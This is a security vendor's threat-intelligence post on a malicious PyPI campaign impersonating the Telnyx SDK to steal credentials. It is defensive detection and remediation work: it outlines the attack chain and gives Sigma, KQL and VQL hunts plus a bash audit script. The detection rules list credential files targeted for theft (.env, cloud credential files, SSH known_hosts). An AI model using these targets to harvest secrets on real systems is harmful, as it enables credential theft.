Back to Intelligence

PyPI Supply Chain Attack: Detecting TeamPCP Malicious Telnyx Packages

SA
Security Arsenal Team
April 9, 2026
6 min read

A new campaign by the threat actor known as TeamPCP has been identified targeting developers utilizing the Telnyx SDK on the Python Package Index (PyPI). Discovered by researchers at Socket and Endor Labs, this attack involves the publication of malicious packages designed to impersonate or compromise the integrity of the legitimate telnyx library.

The objective is clear: credential theft. By injecting malicious code into the software supply chain, TeamPCP aims to exfiltrate sensitive API keys, cloud credentials, and developer tokens from the environments where this compromised code is executed. For SOC analysts and DevSecOps engineers, this represents a critical risk vector. If a CI/CD pipeline or developer workstation pulls this malicious package, the breach is immediate and often bypasses traditional perimeter defenses. We need to pivot from "trust" to "verify" immediately within our Python environments.

Technical Analysis

Affected Products and Platforms

  • Platform: Python Package Index (PyPI)
  • Targeted Ecosystem: Python developers and applications integrating Telnyx communication services.
  • Attack Vector: Software Supply Chain Compromise (Malicious Package Upload / Typosquatting).

Vulnerability and Attack Chain

This is not a vulnerability in the Telnyx software itself, but rather an abuse of the package repository ecosystem. The attack chain typically follows this pattern:

  1. Initial Compromise: The threat actor uploads a malicious package to PyPI. In this campaign, TeamPCP utilized names or metadata designed to confuse users looking for the legitimate telnyx library.
  2. Execution: Upon installation (pip install), the malicious package executes code contained in setup.py or __init__.py.
  3. Payload Delivery: The script initiates a reverse shell or data exfiltration mechanism. TeamPCP payloads are known to search for and steal:
    • .env files (containing API keys and secrets)
    • AWS/GCP/Azure credential files
    • SSH keys
    • Browser cookies/stored passwords
  4. C2 Communication: The stolen data is transmitted to a Command and Control (C2) server operated by the attackers.

Exploitation Status

  • Status: Confirmed Active Exploitation (In-the-Wild).
  • Source: Socket and Endor Labs have confirmed the existence of the malicious packages targeting Telnyx users.

Detection & Response

SIGMA Rules

The following Sigma rules focus on the post-exploitation behavior typical of TeamPCP and similar Python supply chain attacks: suspicious file access by the Python interpreter and the spawning of shells from the package installation process.

YAML
---
title: Python Script Accessing Sensitive Credential Files
id: 8a4b2c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects Python processes accessing sensitive files like .env, .aws/credentials, or known_hosts, common behavior in supply chain credential theft payloads like TeamPCP.
references:
  - https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
author: Security Arsenal
date: 2025/03/18
tags:
  - attack.credential_access
  - attack.t1552.001
logsource:
  category: file_access
  product: windows
detection:
  selection:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
    TargetFilename|contains:
      - '.env'
      - '.aws\credentials'
      - '.azure\credentials'
      - 'known_hosts'
  condition: selection
falsepositives:
  - Legitimate developer tools reading config (rare during execution flow)
level: high
---
title: Suspicious Child Process of Pip Installer
id: 9b5c3d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects pip.exe spawning a shell (cmd.exe or powershell.exe), which may indicate a malicious setup script executing a payload during installation.
references:
  - https://attack.mitre.org/techniques/T1059/
author: Security Arsenal
date: 2025/03/18
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\pip.exe'
      - '\pip3.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
falsepositives:
  - Legitimate post-install scripts that configure the environment
level: medium
---
title: Linux Python Process Accessing .env Files
id: 0c6d4e3f-7a8b-6c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: Detects Python interpreter on Linux accessing .env files, indicative of credential harvesting malware in supply chain attacks.
references:
  - https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
author: Security Arsenal
date: 2025/03/18
tags:
  - attack.credential_access
  - attack.t1552.001
logsource:
  category: file_access
  product: linux
detection:
  selection:
    exe|endswith:
      - '/python'
      - '/python3'
    name|endswith:
      - '.env'
      - '.aws/credentials'
  condition: selection
falsepositives:
  - Developer reading own config files manually
level: high

KQL (Microsoft Sentinel)

This query hunts for Python processes accessing files typically associated with secrets or configuration, focusing on the immediate timeframe following a package installation or during unusual execution contexts.

KQL — Microsoft Sentinel / Defender
// Hunt for Python processes accessing sensitive credential files
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessVersionInfoOriginalFileName in~ ("python.exe", "python3.exe", "python")
| extend FileName = tostring(split(ProcessVersionInfoOriginalFileName, ".")[0])
| where ProcessCommandLine has ".env" 
   or ProcessCommandLine has ".aws" 
   or ProcessCommandLine has "credentials"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

Velociraptor VQL

Use this VQL artifact to hunt for the presence of the TeamPCP payload indicators or general suspicious behavior in Python environments. This artifact checks for Python processes accessing sensitive environment files.

VQL — Velociraptor
-- Hunt for Python processes accessing sensitive credential paths
SELECT
  Process.Pid,
  Process.Name,
  Process.Cmdline,
  Process.Exe,
  Process.Username,
  Process.Ctime
FROM pslist()
WHERE Name =~ "python"
  AND (
    Cmdline =~ ".env"
    OR Cmdline =~ ".aws/credentials"
    OR Cmdline =~ ".kube/config"
    OR Cmdline =~ "known_hosts"
  )

Remediation Script (Bash)

The following script assists Linux environments in auditing installed packages for the specific telnyx package (verifying its origin) and removing packages that do not match the official vendor signature, as well as purging potentially malicious cached wheels.

Bash / Shell
#!/bin/bash
# Audit and Remediation for TeamPCP PyPI Supply Chain Attack
# Targeting Telnyx package impersonation

echo "[*] Starting audit for Telnyx package compromise..."

# Function to check package details
check_package() {
    pkg_name=$1
    echo "[+] Checking package: $pkg_name"
    pip show "$pkg_name"
}

# 1. Check if Telnyx is installed and list details
if pip show telnyx > /dev/null 2>&1; then
    echo "[!] Telnyx package is installed. Verifying integrity..."
    check_package telnyx
    
    echo "[!] Action: Verify the 'Home-page' or 'Author' field above matches official Telnyx sources."
    echo "[!] If suspicious, run: pip uninstall telnyx -y"
else
    echo "[info] Telnyx package not found in current environment."
fi

# 2. List all recently installed packages (last 24 hours modified)
echo "[*] Checking for packages modified/installed in the last 24 hours..."
find /usr/local/lib/python*/dist-packages /home/*/.local/lib/python*/site-packages -name "*.egg-info" -mtime -1 2>/dev/null

# 3. Purge pip cache to remove malicious wheels if downloaded
echo "[*] Clearing pip cache to remove potential malicious artifacts..."
pip cache purge

echo "[*] Audit complete. Please review the output manually."
echo "[*] Recommendation: Reinstall Telnyx using 'pip install telnyx --force-reinstall' only after verifying source."

Remediation

  1. Immediate Audit: Run the remediation script above or manually inspect installed Python packages.
    • Command: pip list
    • Identify the telnyx package version.
  2. Verify Integrity: Compare the installed package metadata (pip show telnyx) against the official Telnyx PyPI page. If the Author, Home-page, or Version does not match the official repository exactly, treat the environment as compromised.
  3. Removal: If a malicious package is identified:
    • Command: pip uninstall telnyx -y
    • Rotate all credentials (API keys, tokens, passwords) that may have been present in environment variables or configuration files on the affected host.
  4. Reinstallation: Install the legitimate package directly from the verified PyPI source:
    • Command: pip install telnyx
  5. Dependency Pinning: Update your requirements.txt or pyproject.toml to strictly pin the version of the telnyx package to a known good hash to prevent future supply chain drift.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

socmdrmanaged-socdetectionteampcppypisoftware-supply-chaincredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action